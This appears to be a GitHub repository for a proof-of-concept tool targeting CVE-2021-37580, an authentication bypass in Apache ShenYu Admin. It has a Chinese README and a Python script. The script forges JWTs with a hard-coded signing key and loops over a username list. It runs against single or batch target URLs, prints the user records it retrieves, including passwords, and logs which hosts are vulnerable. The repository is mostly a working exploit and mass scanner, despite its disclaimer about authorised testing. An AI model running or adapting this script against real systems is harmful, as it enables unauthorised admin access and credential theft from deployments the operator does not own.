├── url.txt
├── username.txt
├── .DS_Store
├── _v_images
    ├── .DS_Store
    ├── 2021-11-17-22-35-58-image.png
    ├── 2021-11-17-22-36-45-image.png
    └── 2021-11-17-23-42-06-image.png
├── README.md
└── CVE-2021-37580.py


/url.txt:
--------------------------------------------------------------------------------
1 | http://localhost:8080


--------------------------------------------------------------------------------
/username.txt:
--------------------------------------------------------------------------------
1 | 123
2 | Root
3 | Admin
4 | admin
5 | root
6 | 


--------------------------------------------------------------------------------
/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fengwenhua/CVE-2021-37580/HEAD/.DS_Store


--------------------------------------------------------------------------------
/_v_images/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fengwenhua/CVE-2021-37580/HEAD/_v_images/.DS_Store


--------------------------------------------------------------------------------
/_v_images/2021-11-17-22-35-58-image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fengwenhua/CVE-2021-37580/HEAD/_v_images/2021-11-17-22-35-58-image.png


--------------------------------------------------------------------------------
/_v_images/2021-11-17-22-36-45-image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fengwenhua/CVE-2021-37580/HEAD/_v_images/2021-11-17-22-36-45-image.png


--------------------------------------------------------------------------------
/_v_images/2021-11-17-23-42-06-image.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fengwenhua/CVE-2021-37580/HEAD/_v_images/2021-11-17-23-42-06-image.png


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2021-37580
 2 | 
 3 | >  CVE-2021-37580 的 poc
 4 | 
 5 | ## 0x00 漏洞原理
 6 | 
 7 | 漏洞原理：[# Apache ShenYu Admin bypass JWT authentication CVE-2021-37580](https://articles.zsxq.com/id_crk7w2w1wjwa.html)
 8 | 
 9 | ## 0x01 单个url
10 | 
11 | ```bash
12 | Usage: python3 CVE-2021-37580.py -u url -n username.txt
13 | ```
14 | 
15 | `shenyu-admin-2.4.0`的，有漏洞的如下：
16 | 
17 | ![2021-11-17-22-35-58-image.png](_v_images/2021-11-17-22-35-58-image.png)
18 | 
19 | `shenyu-admin-2.4.1`的，没有漏洞的如下：
20 | 
21 | ![](_v_images/2021-11-17-22-36-45-image.png)
22 | 
23 | ## 0x02 批量url检测
24 | 
25 | ```bash
26 | Usage: python3 CVE-2021-37580.py -f url.txt -n username.txt
27 | ```
28 | 
29 | ![](_v_images/2021-11-17-23-42-06-image.png)
30 | 
31 | ## 0x03 脚本报错
32 | 
33 | 如果脚本运行报错:
34 | 
35 | ```
36 | AttributeError: module 'jwt' has no attribute 'encode'
37 | ```
38 | 
39 | 执行如下命令：
40 | 
41 | ```bash
42 | python3 -m pip uninstall jwt
43 | python3 -m pip uninstall pyjwt
44 | python3 -m pip install pyjwt==1.5.3 --user
45 | ```
46 | 
47 | ## 0x04 免责声明
48 | 本工具仅面向合法授权的企业安全建设行为，如您需要测试本工具的可用性，请自行搭建靶机环境。
49 | 
50 | 在使用本工具进行检测时，您应确保该行为符合当地的法律法规，并且已经取得了足够的授权。请勿对非授权目标进行扫描。
51 | 
52 | 如您在使用本工具的过程中存在任何非法行为，您需自行承担相应后果，我们将不承担任何法律及连带责任。
53 | 
54 | 在安装并使用本工具前，请您务必审慎阅读、充分理解各条款内容，限制、免责条款或者其他涉及您重大权益的条款可能会以加粗、加下划线等形式提示您重点注意。 除非您已充分阅读、完全理解并接受本协议所有条款，否则，请您不要安装并使用本工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的，即视为您已阅读并同意本协议的约束。
55 | 


--------------------------------------------------------------------------------
/CVE-2021-37580.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python3
  2 | # -*- coding: utf-8 -*-
  3 | # @Date    : 2021-11-17 20:40:04
  4 | # @Author  : 江南小虫虫 (fwh13612265462@gmail.com)
  5 | # @Link    : https://fengwenhua.top
  6 | import jwt
  7 | import time
  8 | import requests
  9 | import json
 10 | import sys
 11 | import argparse
 12 | requests.packages.urllib3.disable_warnings()
 13 | 
 14 | 
 15 | def generateToken(username):
 16 |     headers = {
 17 |         "alg": "HS256",
 18 |         "typ": "JWT"
 19 |     }
 20 |     # 设置headers，即加密算法的配置
 21 |     salt = "2095132720951327"
 22 |     # 随机的salt密钥，只有token生成者（同时也是校验者）自己能有，用于校验生成的token是否合法
 23 |     exp = int(time.time())
 24 |     # 设置超时时间：当前时间的100s以后超时
 25 |     payload = {
 26 |         "userName": username,
 27 |         "exp": exp
 28 |     }
 29 |     # 配置主体信息，一般是登录成功的用户之类的，因为jwt的主体信息很容易被解码，所以不要放敏感信息
 30 |     # 当然也可以将敏感信息加密后再放进payload
 31 | 
 32 |     token = jwt.encode(payload=payload, key=salt,
 33 |                        algorithm='HS256', headers=headers).decode('utf-8')
 34 |     # 生成token
 35 |     # print(token)
 36 |     return token
 37 | 
 38 | 
 39 | def load_file(file_path):
 40 |     try:
 41 |         with open(file_path, 'r') as f:
 42 |             content = f.read().splitlines()
 43 |             return content
 44 |     except Exception as e:
 45 |         if 'username.txt' in str(e):
 46 |             print(
 47 |                 '找不到用户名字典文件！！！请用参数-n 指定一个用户名字典.txt，或者新建一个 username.txt，放在脚本的同目录下，文件的内容是，一行一个用户名')
 48 |         else:
 49 |             print(e)
 50 |         sys.exit(-1)
 51 | 
 52 | 
 53 | def write_file(data_list):
 54 |     with open('CVE-2021-37580-vul-list-{}.txt'.format(log_time), 'w') as f:
 55 |         f.write('\n'.join(data_list))
 56 | 
 57 | 
 58 | def poc(host, username):
 59 |     url = host + '/dashboardUser'
 60 |     headers = {
 61 |         'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0',
 62 |         'X-Access-Token': generateToken(username)
 63 |     }
 64 |     r = requests.get(url, headers=headers, verify=False)
 65 |     result = r.text
 66 |     # print(result)
 67 |     if r.status_code == 200 and 'password' in result:
 68 |         dataList = json.loads(result)['data']['dataList']
 69 |         #print('{} is VUL!! '.format(host))
 70 |         # print(dataList)
 71 |         return dataList
 72 |     else:
 73 |         # {"code":600,"message":"token is error"}
 74 |         # print('{} is NO VUL'.format(host))
 75 |         return False
 76 | 
 77 | 
 78 | if __name__ == '__main__':
 79 |     if len(sys.argv) == 1:
 80 |         print("Usage: python3 CVE-2021-37580.py -u url -n username.txt")
 81 |         sys.exit()
 82 |     parser = argparse.ArgumentParser(
 83 |         description='CVE-2021-37580 poc工具')
 84 |     parser.add_argument('-u', '--url', help='指定单个url')
 85 |     parser.add_argument('-f', '--file', help='指定url.txt')
 86 |     parser.add_argument(
 87 |         '-n', '--name', default='username.txt', help='指定用户名文件字典.txt')
 88 |     args = parser.parse_args()
 89 | 
 90 |     target = args.url
 91 |     name_file = args.name
 92 |     log_time = int(time.time())
 93 |     logs_file = open('CVE-2021-37580-log-{}.txt'.format(log_time), 'w')
 94 |     vul = False
 95 |     if target:
 96 |         if not 'http' in target:
 97 |             target = 'http://' + target
 98 |         print('[*] checking {}'.format(target))
 99 |         print('[*] checking {}'.format(target), file=logs_file)
100 |         try:
101 |             for name in load_file(name_file):
102 |                 print('[*] using name: {}'.format(name))
103 |                 print('[*] using name: {}'.format(name), file=logs_file)
104 |                 res = poc(target, name)
105 |                 if res:
106 |                     print('[+] {} is VUL!! '.format(target))
107 |                     print('[+] {} is VUL!! '.format(target), file=logs_file)
108 |                     print(res)
109 |                     vul = True
110 |                     break
111 |             if not vul:
112 |                 print('[-] {} is NO VUL!! '.format(target))
113 |                 print('[-] {} is NO VUL!! '.format(target), file=logs_file)
114 |         except Exception as e:
115 |             print(e)
116 |     if args.file:
117 |         vul_url_list = []
118 |         try:
119 |             for url in load_file(args.file):
120 |                 if not 'http' in url:
121 |                     url = 'http://' + url
122 |                 print('[*] checking {}'.format(url))
123 |                 print('[*] checking {}'.format(url), file=logs_file)
124 |                 try:
125 |                     for name in load_file(name_file):
126 |                         print('[*] using name: {}'.format(name))
127 |                         print('[*] using name: {}'.format(name), file=logs_file)
128 |                         res = poc(url, name)
129 |                         if res:
130 |                             print('[+] {} is VUL!! '.format(url))
131 |                             print('[+] {} is VUL!! '.format(url),
132 |                                   file=logs_file)
133 |                             print(res)
134 |                             print(res, file=logs_file)
135 |                             vul = True
136 |                             vul_url_list.append(url)
137 |                             break
138 |                     if not vul:
139 |                         print('[-] {} is NO VUL!! '.format(url))
140 |                         print('[-] {} is NO VUL!! '.format(url), file=logs_file)
141 |                 except Exception as e:
142 |                     print(e)
143 |                     print(e, file=logs_file)
144 |                 print('\r\n')
145 |                 print('\r\n', file=logs_file)
146 |         except Exception as e:
147 |             print(e)
148 |             print(e, file=logs_file)
149 |         if len(vul_url_list) > 0:
150 |             write_file(vul_url_list)
151 |             print("有漏洞的url列表已经写入文件当前目录下的 CVE-2021-37580-vul-list.txt 了")
152 |     logs_file.close()
153 | 


--------------------------------------------------------------------------------